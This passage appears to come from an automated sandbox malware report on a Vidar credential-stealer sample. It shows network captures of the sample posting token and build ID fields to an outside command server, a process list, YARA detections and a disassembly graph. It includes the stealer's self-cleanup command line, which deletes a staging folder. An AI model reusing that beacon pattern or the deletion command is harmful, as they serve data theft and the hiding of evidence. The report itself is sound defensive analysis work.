                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          2024-10-23 15:06:35 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          23192.168.2.44997695.217.220.1034435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:06:36 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHI
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:06:36 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 36 34 31 64 61 62 66 32 38 39 65 61 39 34 66 37 36 39 66 36 30 63 65 66 31 38 30 63 37 65 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 62 33 62 64 36 39 34 33 30 62 37 64 38 32 37 62 31 30 37 62 61 32 65 64 38 30 39 32 30 37 64 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                          Data Ascii: ------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="token"62641dabf289ea94f769f60cef180c7e------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------BAKFCBFHJDHJKECAKEHICont
                                                                                                                                                                                                                          2024-10-23 15:06:36 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:06:36 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          2024-10-23 15:06:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          24192.168.2.44998795.217.220.1034435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:06:37 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----KEBFBGDGHIIJJKEBKJDB
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:06:37 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 46 42 47 44 47 48 49 49 4a 4a 4b 45 42 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 36 34 31 64 61 62 66 32 38 39 65 61 39 34 66 37 36 39 66 36 30 63 65 66 31 38 30 63 37 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 42 47 44 47 48 49 49 4a 4a 4b 45 42 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 62 33 62 64 36 39 34 33 30 62 37 64 38 32 37 62 31 30 37 62 61 32 65 64 38 30 39 32 30 37 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 42 47 44 47 48 49 49 4a 4a 4b 45 42 4b 4a 44 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                          Data Ascii: ------KEBFBGDGHIIJJKEBKJDBContent-Disposition: form-data; name="token"62641dabf289ea94f769f60cef180c7e------KEBFBGDGHIIJJKEBKJDBContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------KEBFBGDGHIIJJKEBKJDBCont
                                                                                                                                                                                                                          2024-10-23 15:06:38 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:06:38 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          2024-10-23 15:06:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                          Start time:11:04:59
                                                                                                                                                                                                                          Start date:23/10/2024
                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\UMrFwHyjUi.exe"
                                                                                                                                                                                                                          Imagebase:0x190000
                                                                                                                                                                                                                          File size:631'936 bytes
                                                                                                                                                                                                                          MD5 hash:0D90EF55D1B1CB43CCB8FD30BBEBA1A4
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                          Start time:11:05:00
                                                                                                                                                                                                                          Start date:23/10/2024
                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\UMrFwHyjUi.exe"
                                                                                                                                                                                                                          Imagebase:0x190000
                                                                                                                                                                                                                          File size:631'936 bytes
                                                                                                                                                                                                                          MD5 hash:0D90EF55D1B1CB43CCB8FD30BBEBA1A4
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                          Start time:11:05:00
                                                                                                                                                                                                                          Start date:23/10/2024
                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\UMrFwHyjUi.exe"
                                                                                                                                                                                                                          Imagebase:0x190000
                                                                                                                                                                                                                          File size:631'936 bytes
                                                                                                                                                                                                                          MD5 hash:0D90EF55D1B1CB43CCB8FD30BBEBA1A4
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                          Start time:11:05:00
                                                                                                                                                                                                                          Start date:23/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 272
                                                                                                                                                                                                                          Imagebase:0xb30000
                                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                          Start time:11:06:37
                                                                                                                                                                                                                          Start date:23/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFCBGCGIJKJ" & exit
                                                                                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                          Start time:11:06:37
                                                                                                                                                                                                                          Start date:23/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                          Start time:11:06:37
                                                                                                                                                                                                                          Start date:23/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:timeout /t 10
                                                                                                                                                                                                                          Imagebase:0x480000
                                                                                                                                                                                                                          File size:25'088 bytes
                                                                                                                                                                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                            Execution Coverage:0.7%
                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                            Signature Coverage:8.2%
                                                                                                                                                                                                                            Total number of Nodes:233
                                                                                                                                                                                                                            Total number of Limit Nodes:4
                                                                                                                                                                                                                            execution_graph 41257 1957e2 41258 1957ed KiUserExceptionDispatcher 41257->41258 41259 19724e Concurrency::cancel_current_task 41257->41259 41258->41259 41262 19ad9b RaiseException 41259->41262 41261 19726a 41262->41261 41263 1997a6 41264 1997b2 __FrameHandler3::FrameUnwindToState 41263->41264 41291 1994d5 41264->41291 41266 1997b9 41267 19990c 41266->41267 41279 1997e3 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 41266->41279 41323 19a085 4 API calls 2 library calls 41267->41323 41269 199913 41324 1a3ccb 23 API calls __FrameHandler3::FrameUnwindToState 41269->41324 41271 199919 41325 1a3c8f 23 API calls __FrameHandler3::FrameUnwindToState 41271->41325 41273 199921 41274 199802 41275 199883 41299 19a19a 41275->41299 41279->41274 41279->41275 41319 1a0932 43 API calls 2 library calls 41279->41319 41283 19989e 41320 19a1d0 GetModuleHandleW 41283->41320 41285 1998a5 41285->41269 41286 1998a9 41285->41286 41287 1998b2 41286->41287 41321 1a3c80 23 API calls __FrameHandler3::FrameUnwindToState 41286->41321 41322 199646 79 API calls ___scrt_uninitialize_crt 41287->41322 41290 1998ba 41290->41274 41292 1994de 41291->41292 41326 199b05 IsProcessorFeaturePresent 41292->41326 41294 1994ea 41327 19c858 10 API calls 2 library calls 41294->41327 41296 1994ef 41297 1994f3 41296->41297 41328 19c877 7 API calls 2 library calls 41296->41328 41297->41266 41329 19aa90 41299->41329 41301 19a1ad GetStartupInfoW 41302 199889 41301->41302 41303 1a46e5 41302->41303 41330 1add4f 41303->41330 41305 199891 41308 192f7c GetPEB 41305->41308 41307 1a46ee 41307->41305 41336 1ae002 43 API calls 41307->41336 41554 192805 41308->41554 41313 192fd7 41585 1949da 71 API calls std::_Facet_Register 41313->41585 41315 192fe0 41317 192ff7 41315->41317 41586 19277a 44 API calls Concurrency::cancel_current_task 41315->41586 41317->41283 41318 193019 41319->41275 41320->41285 41321->41287 41322->41290 41323->41269 41324->41271 41325->41273 41326->41294 41327->41296 41328->41297 41329->41301 41331 1add58 41330->41331 41335 1add8a 41330->41335 41337 1a8e6e 41331->41337 41335->41307 41336->41307 41338 1a8e79 41337->41338 41339 1a8e7f 41337->41339 41388 1a746e 6 API calls _unexpected 41338->41388 41343 1a8e85 41339->41343 41389 1a74ad 6 API calls _unexpected 41339->41389 41342 1a8e99 41342->41343 41344 1a8e9d 41342->41344 41347 1a8e8a 41343->41347 41397 19dd93 43 API calls __FrameHandler3::FrameUnwindToState 41343->41397 41390 1a69f8 14 API calls 3 library calls 41344->41390 41365 1adb5a 41347->41365 41348 1a8ea9 41350 1a8eb1 41348->41350 41351 1a8ec6 41348->41351 41391 1a74ad 6 API calls _unexpected 41350->41391 41393 1a74ad 6 API calls _unexpected 41351->41393 41354 1a8ebd 41392 1a6fdf 14 API calls __dosmaperr 41354->41392 41355 1a8ed2 41356 1a8ed6 41355->41356 41357 1a8ee5 41355->41357 41394 1a74ad 6 API calls _unexpected 41356->41394 41395 1a8be1 14 API calls _unexpected 41357->41395 41361 1a8ef0 41396 1a6fdf 14 API calls __dosmaperr 41361->41396 41362 1a8ec3 41362->41343 41364 1a8ef7 41364->41347 41398 1adcaf 41365->41398 41370 1adb9d 41370->41335 41373 1adbb6 41436 1a6fdf 14 API calls __dosmaperr 41373->41436 41374 1adbc4 41425 1addaa 41374->41425 41378 1adbfc 41437 1a2cee 14 API calls __dosmaperr 41378->41437 41380 1adc01 41438 1a6fdf 14 API calls __dosmaperr 41380->41438 41381 1adc43 41382 1adc8c 41381->41382 41440 1ad7cc 43 API calls 2 library calls 41381->41440 41441 1a6fdf 14 API calls __dosmaperr 41382->41441 41384 1adc17 41384->41381 41439 1a6fdf 14 API calls __dosmaperr 41384->41439 41388->41339 41389->41342 41390->41348 41391->41354 41392->41362 41393->41355 41394->41354 41395->41361 41396->41364 41399 1adcbb __FrameHandler3::FrameUnwindToState 41398->41399 41400 1adcd5 41399->41400 41442 1a0e12 EnterCriticalSection 41399->41442 41402 1adb84 41400->41402 41445 19dd93 43 API calls __FrameHandler3::FrameUnwindToState 41400->41445 41409 1ad8da 41402->41409 41403 1add11 41444 1add2e LeaveCriticalSection std::_Lockit::~_Lockit 41403->41444 41407 1adce5 41407->41403 41443 1a6fdf 14 API calls __dosmaperr 41407->41443 41446 1a2d01 41409->41446 41412 1ad8fb GetOEMCP 41414 1ad924 41412->41414 41413 1ad90d 41413->41414 41415 1ad912 GetACP 41413->41415 41414->41370 41416 1a7a23 41414->41416 41415->41414 41417 1a7a61 41416->41417 41418 1a7a31 41416->41418 41458 1a2cee 14 API calls __dosmaperr 41417->41458 41419 1a7a4c HeapAlloc 41418->41419 41424 1a7a35 _unexpected 41418->41424 41421 1a7a5f 41419->41421 41419->41424 41422 1a7a66 41421->41422 41422->41373 41422->41374 41424->41417 41424->41419 41457 1a378d EnterCriticalSection LeaveCriticalSection std::_Facet_Register 41424->41457 41426 1ad8da 45 API calls 41425->41426 41427 1addca 41426->41427 41429 1ade07 IsValidCodePage 41427->41429 41433 1ade43 __fread_nolock 41427->41433 41431 1ade19 41429->41431 41429->41433 41430 1adbf1 41430->41378 41430->41384 41432 1ade48 GetCPInfo 41431->41432 41435 1ade22 __fread_nolock 41431->41435 41432->41433 41432->41435 41470 199367 41433->41470 41459 1ad9ae 41435->41459 41436->41370 41437->41380 41438->41370 41439->41381 41440->41382 41441->41370 41442->41407 41443->41403 41444->41400 41447 1a2d1f 41446->41447 41453 1a2d18 41446->41453 41447->41453 41454 1a8db3 43 API calls 3 library calls 41447->41454 41449 1a2d40 41455 1a7a71 43 API calls __Getctype 41449->41455 41451 1a2d56 41456 1a7acf 43 API calls _swprintf 41451->41456 41453->41412 41453->41413 41454->41449 41455->41451 41456->41453 41457->41424 41458->41422 41460 1ad9d6 GetCPInfo 41459->41460 41469 1ada9f 41459->41469 41466 1ad9ee 41460->41466 41460->41469 41461 199367 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 41464 1adb58 41461->41464 41464->41433 41477 1ac8cb 41466->41477 41468 1acbc2 48 API calls 41468->41469 41469->41461 41471 19936f 41470->41471 41472 199370 IsProcessorFeaturePresent 41470->41472 41471->41430 41474 199eb1 41472->41474 41553 199e74 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 41474->41553 41476 199f94 41476->41430 41478 1a2d01 std::_Locinfo::_Locinfo_dtor 43 API calls 41477->41478 41479 1ac8eb 41478->41479 41497 1acd7f 41479->41497 41481 1ac918 41482 1ac9a7 41481->41482 41483 1ac9af 41481->41483 41487 1a7a23 __fread_nolock 15 API calls 41481->41487 41488 1ac93d __fread_nolock __alloca_probe_16 41481->41488 41500 1992af 14 API calls std::_Locinfo::~_Locinfo 41482->41500 41484 199367 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 41483->41484 41485 1ac9d2 41484->41485 41492 1acbc2 41485->41492 41487->41488 41488->41482 41489 1acd7f __fread_nolock MultiByteToWideChar 41488->41489 41490 1ac988 41489->41490 41490->41482 41491 1ac993 GetStringTypeW 41490->41491 41491->41482 41493 1a2d01 std::_Locinfo::_Locinfo_dtor 43 API calls 41492->41493 41494 1acbd5 41493->41494 41501 1ac9d4 41494->41501 41498 1acd90 MultiByteToWideChar 41497->41498 41498->41481 41500->41483 41502 1ac9ef 41501->41502 41503 1acd7f __fread_nolock MultiByteToWideChar 41502->41503 41506 1aca35 41503->41506 41504 1acbad 41505 199367 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 41504->41505 41507 1acbc0 41505->41507 41506->41504 41508 1a7a23 __fread_nolock 15 API calls 41506->41508 41510 1aca5b __alloca_probe_16 41506->41510 41528 1acae1 41506->41528 41507->41468 41508->41510 41511 1acd7f __fread_nolock MultiByteToWideChar 41510->41511 41510->41528 41512 1acaa0 41511->41512 41512->41528 41529 1a762c 41512->41529 41515 1acb0a 41517 1acb95 41515->41517 41518 1a7a23 __fread_nolock 15 API calls 41515->41518 41521 1acb1c __alloca_probe_16 41515->41521 41516 1acad2 41520 1a762c std::_Locinfo::_Locinfo_dtor 7 API calls 41516->41520 41516->41528 41540 1992af 14 API calls std::_Locinfo::~_Locinfo 41517->41540 41518->41521 41520->41528 41521->41517 41522 1a762c std::_Locinfo::_Locinfo_dtor 7 API calls 41521->41522 41523 1acb5f 41522->41523 41523->41517 41538 1acdfb WideCharToMultiByte 41523->41538 41525 1acb79 41525->41517 41526 1acb82 41525->41526 41539 1992af 14 API calls std::_Locinfo::~_Locinfo 41526->41539 41541 1992af 14 API calls std::_Locinfo::~_Locinfo 41528->41541 41542 1a71bb 41529->41542 41532 1a763d LCMapStringEx 41537 1a7684 41532->41537 41533 1a7664 41545 1a7689 5 API calls std::_Locinfo::_Locinfo_dtor 41533->41545 41536 1a767d LCMapStringW 41536->41537 41537->41515 41537->41516 41537->41528 41538->41525 41539->41528 41540->41528 41541->41504 41546 1a72ba 41542->41546 41545->41536 41547 1a72e8 41546->41547 41550 1a71d1 41546->41550 41548 1a71ef _unexpected LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 41547->41548 41547->41550 41549 1a72fc 41548->41549 41549->41550 41551 1a7302 GetProcAddress 41549->41551 41550->41532 41550->41533 41551->41550 41552 1a7312 _unexpected 41551->41552 41552->41550 41553->41476 41555 192835 41554->41555 41566 1928d0 std::ios_base::_Ios_base_dtor 41555->41566 41587 195643 44 API calls 4 library calls 41555->41587 41557 1929e7 41591 193134 43 API calls _Deallocate 41557->41591 41559 1929f0 41560 199367 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 41559->41560 41561 192a02 41560->41561 41575 192e7a 41561->41575 41564 192a09 41592 1a0932 43 API calls 2 library calls 41564->41592 41565 1911cb 74 API calls 41565->41566 41566->41557 41566->41564 41566->41565 41588 195643 44 API calls 4 library calls 41566->41588 41589 193134 43 API calls _Deallocate 41566->41589 41590 191349 44 API calls 3 library calls 41566->41590 41583 192eb1 41575->41583 41584 192ee1 41575->41584 41577 199367 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 41578 192ef5 VirtualProtect 41577->41578 41578->41313 41578->41317 41580 192ef9 41596 194017 43 API calls _Deallocate 41580->41596 41583->41580 41583->41584 41593 1935de 44 API calls 2 library calls 41583->41593 41594 192a0f 74 API calls 2 library calls 41583->41594 41595 194017 43 API calls _Deallocate 41583->41595 41584->41577 41585->41315 41586->41318 41587->41555 41588->41566 41589->41566 41590->41566 41591->41559 41593->41583 41594->41583 41595->41583 41596->41584

                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                            Function 00192F7C Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 170 192f7c-192fd5 GetPEB call 192805 call 192e7a VirtualProtect 175 193007-19300e 170->175 176 192fd7-192fef call 1949da 170->176 179 193011-193019 call 19277a 176->179 180 192ff1-192ff5 176->180 180->179 182 192ff7-193002 call 19315a 180->182 182->175
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualProtect.KERNELBASE(00222A60,000004E4,00000040,?), ref: 00192FD1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                                                                                                            • Opcode ID: 76358a7298f06c9afca292a05df3ca2594afb3adad8c1c2d81263d23fcc20480
                                                                                                                                                                                                                            • Instruction ID: 75013d7f6e6bfade49deb9388ac6ee612568bced2f33c097b6d74a02f7780193
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76358a7298f06c9afca292a05df3ca2594afb3adad8c1c2d81263d23fcc20480
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65110232204304AFE718EF24D801F6AB394FF58720F04081DF964873D2DBB1EA01C696
                                                                                                                                                                                                                            Function 001AC9D4 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
